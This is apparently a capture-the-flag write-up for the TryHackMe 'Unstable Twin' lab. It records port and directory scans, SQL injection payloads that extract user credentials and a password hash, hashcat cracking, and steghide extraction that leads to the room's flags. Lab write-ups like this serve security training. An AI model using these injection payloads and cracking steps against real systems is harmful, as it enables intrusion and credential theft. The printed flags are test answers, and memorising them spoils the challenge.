Enumeration
Port Scan
# Nmap 7.80 scan initiated Fri Apr 30 20:47:09 2021 as: nmap -sC -sV -oA nmap/output unstabletwin.thm
Nmap scan report for unstabletwin.thm (10.10.59.62)
Host is up (0.56s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 ba:a2:40:8e:de:c3:7b:c7:f7:b3:7e:0c:1e:ec:9f:b8 (RSA)
| 256 38:28:4c:e1:4a:75:3d:0d:e7:e4:85:64:38:2a:8e:c7 (ECDSA)
|_ 256 1a:33:a0:ed:83:ba:09:a5:62:a7:df:ab:2f:ee:d0:99 (ED25519)
80/tcp open http nginx 1.14.1
|_http-server-header: nginx/1.14.1
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 30 20:48:29 2021 -- 1 IP address (1 host up) scanned in 79.55 seconds
Gobuster
monoloco@kali:~$ gobuster dir -u http://unstabletwin.thm -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2
.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://unstabletwin.thm
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/04/30 20:50:11 Starting gobuster
===============================================================
/info (Status: 200)
Julias Server
Vincents Server
**Version: **1.3.4-dev
API Endpoints
Seems like GET method is not allowed
SQLi
Payload test' union select username,password from users–
Extracted credentials
[ [ “julias”, “Red” ], [ “linda”, “Green” ], [ “marnie”, “Yellow " ], [ “mary_ann”, “continue…” ], [ “vincent”, “Orange” ] ]
Extract Notes
Payload: test' UNION SELECT 1,notes FROM notes– -
Password: eaf0651dabef9c7de8a70843030924d335a2a8ff5fd1b13c4cb099e66efe25ecaa607c4b7dd99c43b0c01af669c90fd6a14933422cf984324f645b84427343f4
Crack the hash (sha-512)
hashcat -m 1700 hash /usr/share/wordlists/rockyou.txt
Extracted Password: experiment
User Flag
Flag: THM{Mary_Ann_notes}
Final Flag
Read server_notes.txt
Now you have found my notes you now you need to put my extended family together.
need to GET their IMAGE for the family album. These can be retrieved by NAME.
You need to find all of them and a picture of myself!
Get pictures
curl http://unstabletwin/get_image?name=julias --output julias.jpg
Script to automate the task of getting all images:
mapfile -t usernames_arr < usernames
for i in "${usernames_arr[@]}"
do
curl http://unstabletwin/get_image?name=$i --output $i.jpg
done
Steghide
monoloco@kali:~/Dokumente/THM/unstabletwin$ steghide extract -sf julias.jpg
Passwort eingeben:
Extrahierte Daten wurden nach "julias.txt" geschrieben.
(failed reverse-i-search)`lind': curl http://unstabletwin/get_image?name=^Cnda --output linda.jpg
monoloco@kali:~/Dokumente/THM/unstabletwin$ steghide extract -sf linda.jpg
Passwort eingeben:
Extrahierte Daten wurden nach "linda.txt" geschrieben.
monoloco@kali:~/Dokumente/THM/unstabletwin$ steghide extract -sf marine.jpg
Passwort eingeben:
steghide: Die Datei "marine.jpg" konnte nicht geffnet werden.
monoloco@kali:~/Dokumente/THM/unstabletwin$ steghide extract -sf marnie.jpg
Passwort eingeben:
Extrahierte Daten wurden nach "marine.txt" geschrieben.
monoloco@kali:~/Dokumente/THM/unstabletwin$ steghide extract -sf vincent.jpg
Passwort eingeben:
Extrahierte Daten wurden nach "vincent.txt" geschrieben.
monoloco@kali:~/Dokumente/THM/unstabletwin$ steghide extract -sf marie_ann.jpg
Passwort eingeben:
steghide: Die Datei "marie_ann.jpg" konnte nicht geffnet werden.
What to do next?
cat mary_ann.txt
You need to find all my children and arrange in a rainbow!
The order according to the ROYGBIV
1DVsdb2uEE0k5HK4GAIZPS0Mby2jomUKLjvQ4OSwjKLNAAeCdl2J8BCRuXVXeVYvs6J6HKpZWPG8pfeHoNG1
**Final Flag: **You have found the final flag THM{The_Family_Is_Back_Together}